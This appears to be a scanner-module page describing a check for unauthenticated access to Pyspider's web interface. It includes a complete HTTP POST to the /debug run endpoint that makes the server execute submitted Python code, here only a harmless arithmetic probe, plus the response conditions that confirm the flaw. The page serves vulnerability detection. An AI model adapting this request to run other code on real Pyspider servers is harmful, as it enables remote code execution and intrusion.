Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Pyspider Unauthorized Access" module is designed to detect unauthorized access vulnerabilities in the Pyspider web application framework. Pyspider is a powerful Python-based web crawling and scraping framework that allows users to easily develop web spiders to extract data from websites. This module focuses on identifying potential security weaknesses in the Pyspider application that could lead to unauthorized access.
This module has a severity level of high, indicating that if left unaddressed, the vulnerability it detects could have significant consequences for the security of the Pyspider application.
Author: ritikchaddha
If the "Pyspider Unauthorized Access" vulnerability is successfully exploited, an attacker could gain unauthorized access to sensitive information or perform malicious actions within the Pyspider application. This could lead to data breaches, unauthorized data modifications, or even complete system compromise.
The "Pyspider Unauthorized Access" module works by sending a specific HTTP request to the target Pyspider application and then analyzing the response to determine if the unauthorized access vulnerability is present.
One example of an HTTP request used by this module is:
POST /debug/pyspidervulntest/run HTTP/1.1
Host: {%Hostname%}
Content-Type: application/x-www-form-urlencoded
webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D
This module includes the following matching conditions:
- The response body must contain the word "1020236437". - The response status code must be 200.If both of these conditions are met, the module will identify the presence of the "Pyspider Unauthorized Access" vulnerability.
Reference - https://github.com/ianxtianxt/Pyspider-webui-poc Metadata - max-request: 1